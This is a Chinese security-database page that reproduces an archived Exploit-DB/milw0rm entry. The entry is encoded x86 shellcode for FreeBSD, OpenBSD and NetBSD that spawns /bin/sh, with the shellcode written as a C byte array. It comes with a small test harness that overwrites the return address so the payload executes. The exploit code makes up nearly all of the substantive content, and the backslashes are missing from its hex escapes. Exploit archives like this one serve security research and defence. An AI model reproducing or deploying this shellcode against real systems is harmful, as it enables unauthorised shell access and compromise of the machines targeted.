BSD/x86 – execve(/bin/sh) + Encoded Shellcode (57 bytes)

BSD/x86 – execve(/bin/sh) + Encoded Shellcode (57 bytes)

漏洞ID 1054684 漏洞类型
发布时间 2004-09-26 更新时间 2004-09-26
图片[1]-BSD/x86 – execve(/bin/sh) + Encoded Shellcode (57 bytes)-安全小百科CVE编号 N/A
图片[2]-BSD/x86 – execve(/bin/sh) + Encoded Shellcode (57 bytes)-安全小百科CNNVD-ID N/A
漏洞平台 BSD_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/13252
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
   *BSD version
   FreeBSD, OpenBSD, NetBSD.

   [email protected]

   57 bytes.

   -Encriptado execve(/bin/sh);

   Para mas informacion ver
   http://www.shellcode.com.ar/es/proyectos.html
*/

char shellcode[]=
"xebx1bx5ex31xc0x6ax1ax6ax17x59x49x5bx8ax04x0e"
"xf6xd3x30xd8x88x04x0ex50x85xc9x75xefxebx05xe8"
"xe0xffxffxffx0ex6fxc7xf9xbexa3xe4xffxb8xffxb2"
"xf4x1fx95x4cxfbxf8xfcx1fx74x09xb2x65";

main()
{
   int *ret;
   printf("Shellcode lenght=%dn",sizeof(shellcode));
   ret=(int*)&ret+2;
   (*ret)=(int)shellcode;
}

// milw0rm.com [2004-09-26]

相关推荐: Lotus Domino R5 CVE-2001-1313 Denial-Of-Service Vulnerability

Lotus Domino R5 CVE-2001-1313 Denial-Of-Service Vulnerability 漏洞ID 1209189 漏洞类型 Input Validation Error 发布时间 2001-07-16 更新时间 2001-0…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享